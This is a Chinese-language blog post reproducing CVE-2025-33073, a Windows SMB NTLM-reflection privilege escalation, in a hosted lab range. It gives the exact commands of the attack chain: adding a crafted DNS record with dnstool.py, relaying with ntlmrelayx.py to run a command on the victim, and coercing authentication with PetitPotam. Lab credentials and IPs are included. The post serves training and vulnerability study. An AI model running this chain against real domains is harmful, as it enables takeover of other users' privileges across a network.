首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >CVE-2025-33073:域内大杀器(附复现环境)

CVE-2025-33073:域内大杀器(附复现环境)

作者头像
红队蓝军
发布2025-06-20 11:01:20
发布2025-06-20 11:01:20
2K00
代码可运行
举报
文章被收录于专栏:红队蓝军红队蓝军
运行总次数:0
代码可运行

漏洞背景

2025年6月10日,微软发布了每月例行的安全补丁更新。在此次更新中,编号为CVE-2025-33073的严重漏洞引起了业界广泛的关注和重视。微软官方对该漏洞的描述为SMB客户端特权提升漏洞。然而,经过深入分析发现,该漏洞的威胁程度远远超出了普通意义上的“权限提升”范畴。

该漏洞存在于Windows SMB中,由于访问控制不当,具有普通域用户权限的攻击者可以通过添加恶意的DNS记录并强制域内计算机(域控除外)进行解析来获取域内所有用户的权限,从而达到提权的目的。

图片
图片

环境搭建

目前CyberStrikeLab仿真平台已支持漏洞复现,现在访问即可限时免费轻松复现~

靶机地址:https://www.cyberstrikelab.com/#/scene/detail/42

  • 攻击机器kali:10.6.6.10   (所有需要用到的工具均已集成在机器中)
  • 受害机器:10.6.6.88(CS.cyberstrikelab.com)
  • DC:10.6.6.55 (DC.cyberstrikelab.com)

复现步骤

1.打开平台,点击开启仿真环境靶机

地址:https://www.cyberstrikelab.com/#/scene/detail/42

图片
图片

2.开启后下载openvpn配置文件并连接openvpn

图片
图片

3.使用ssh工具连接攻击机器kali

图片
图片

4.添加一条DNS记录

代码语言:javascript
代码运行次数:0
运行
复制
python3 dnstool.py -u cyberstrikelab.com\\cslab -p "cs1ab@wwe" -r CS1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d 10.6.6.10 --action add 10.6.6.55
图片
图片

5.启动监听

代码语言:javascript
代码运行次数:0
运行
复制
python3 ntlmrelayx.py -t 10.6.6.88 -smb2support -ts -c whoami
图片
图片

6.进行强制NTLM认证

代码语言:javascript
代码运行次数:0
运行
复制
python3 PetitPotam.py -d cyberstrikelab.com -u cslab -p cs1ab@wwe CS1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA 10.6.6.88
图片
图片

7.回显命令

图片
图片

当然这里我们也给大家准备了flag,大家可以在平台上提交

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2025-06-19,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 红队蓝军 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 漏洞背景
  • 环境搭建
  • 复现步骤
    • 1.打开平台,点击开启仿真环境靶机
    • 2.开启后下载openvpn配置文件并连接openvpn
    • 3.使用ssh工具连接攻击机器kali
    • 4.添加一条DNS记录
    • 5.启动监听
    • 6.进行强制NTLM认证
    • 7.回显命令
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档